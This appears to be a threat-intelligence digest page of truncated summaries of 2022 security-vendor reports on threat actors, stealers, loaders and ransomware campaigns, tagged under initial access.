UNC3890 is an Iran-linked threat cluster tracked by Mandiant that targets Israeli shipping, government, energy and healthcare organizations using social-engineering lures and watering holes. The operation leverages a backdoor (SUGARUSH), a credential stealer (…
Tag: INITIAL ACCESS
Cyble researchers uncovered a phishing site impersonating Lindesbergs Kommun that delivers Typhon Stealer via a crafted .lnk file and PowerShell to download the payload. The stealer harvests data from browsers, wallets, gaming apps, and messaging tools, with e…
Morphisec Labs details DoNot Team (APT-C-35) updates to their Windows framework (YTY/Jaca), including new modules, a shellcode loader, and an upgraded browser stealer, with a focus on modular delivery and evasion techniques. The post also highlights infection …
The article compiles a large set of file hash indicators tied to Zeppelin ransomware activity as described in the CISA alert AA22-223a, associated with the StopRansomware campaign. It presents these indicators in a purely IOC-focused format without narrative d…
Cisco Talos and CSIRT describe a May 2022 compromise in which a Cisco employee’s Google account credentials (synced from a personal browser) enabled initial VPN access after MFA bypass via vishing and MFA fatigue. The investigation links the actors to an initi…
Unit 42 analyzes Tropical Scorpius (UNC2596) activity, detailing Cuba Ransomware’s evolution with new tools like ROMCOM RAT, KerberCache, and a kernel driver to defeat defenses, plus its connection to the Industrial Spy marketplace. The report covers ransomwar…
An April 2022 intrusion saw BumbleBee act as the initial access loader, enabling multi-stage payloads and outbound C2 communication within a Windows environment. The operation featured credential dumping, Kerberoasting, privilege escalation tooling, and Cobalt…
APT31 renewed its attacks on Russian media and energy companies by leveraging a malicious document that loads a VMProtect-packed payload, linking the activity to the APT31 toolkit. The campaign uses cloud storage services (notably Yandex.Disk) as C2 to blend i…
FortiGuard Labs tracks RapperBot, a rapidly evolving IoT malware family that borrows heavily from Mirai but switches from Telnet to SSH brute forcing for initial access on Linux devices. The campaign shows notable persistence and credential-access capabilities…
Dark Utilities is a C2-as-a-Service platform released in early 2022 that provides remote access, DDoS, and cryptocurrency mining capabilities, with payloads for Windows, Linux, and Python hosted on IPFS to resist takedowns. Since launch, malware samples have r…
Projector Libra (EXOTIC LILY) distributes Bumblebee via email campaigns that use file-sharing services to deliver malware, replacing the previous loader BazarLoader. The campaign chains ISO images with Windows shortcuts to execute Bumblebee, often followed by …
LOLI Stealer is a Golang-based infostealer sold via a MaaS model, capable of stealing passwords, cookies, wallet data, and screenshots from infected machines. Cyble Research Labs tracked LOLI Stealer and its evolving capabilities, including data exfiltration t…
Robin Banks is a phishing-as-a-service (PhaaS) platform that sells ready-made phishing kits targeting financial information for users in the U.S., U.K., Canada, and Australia. IronNet researchers observed a large-scale June 2022 campaign using Robin Banks to s…
LockBit operators have been observed abusing legitimate security tools to load Cobalt Strike beacons, deploying a living-off-the-land approach to evade defenses. The campaign pivots on using MpCmdRun.exe to decrypt and load a weaponized DLL, following prior si…
Sophos X-Ops describes a coordinated Observe-Orient-Decide-Act loop among SophosLabs, SecOps, MTR, and Sophos AI to study and disrupt a wave of Microsoft SQL Server attacks leveraging old RCE CVEs and delivering Remcos or various ransomware families including …